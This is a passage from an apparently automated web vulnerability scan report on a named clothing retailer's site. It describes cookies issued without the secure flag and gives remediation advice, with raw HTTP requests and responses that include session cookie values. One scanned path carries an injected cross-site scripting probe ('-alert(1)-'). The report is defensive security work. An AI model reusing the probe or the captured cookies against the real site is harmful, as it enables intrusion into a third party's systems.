Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:19:23 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=cf4fjt0aaud30ptev1ec7jdm67; expires=Tue, 09-Nov-2010 17:19:23 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Login-Required: true
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32443

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Custome
...[SNIP]...
</div>

<form action="https://www.fredperry.com/customer/account/loginPost/" method="post" id="login-form">
<fieldset class="col2-set login-page">
...[SNIP]...
<br />
<input name="login[password]" type="password" class="input-text required-entry validate-password" id="pass" title="Password" /><br />
...[SNIP]...

3. SSL cookie without secure flag set
There are 4 instances of this issue:

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.


3.1. https://www.fredperry.com/customer/account/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.fredperry.com
Path:   /customer/account/

Issue detail

The following cookie was issued by the application and does not have the secure flag set: frontend (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /customer/account/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 302 Found
Date: Tue, 09 Nov 2010 16:19:28 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=d2mk5crl1cvamj39pbaqgfbh74; expires=Tue, 09-Nov-2010 17:19:28 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: https://www.fredperry.com/customer/account/login/
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


3.2. https://www.fredperry.com/customer/account/login/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.fredperry.com
Path:   /customer/account/login/

Issue detail

The following cookie was issued by the application and does not have the secure flag set: frontend (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /customer/account/login/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:19:23 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=cf4fjt0aaud30ptev1ec7jdm67; expires=Tue, 09-Nov-2010 17:19:23 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Login-Required: true
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32443

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Custome
...[SNIP]...

3.3. https://www.fredperry.com/customer8c3dc%22-alert(1)-%2276794ee1910/account/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.fredperry.com
Path:   /customer8c3dc%22-alert(1)-%2276794ee1910/account/

Issue detail

The following cookie was issued by the application and does not have the secure flag set. The cookie does not appear to contain a session token, which may red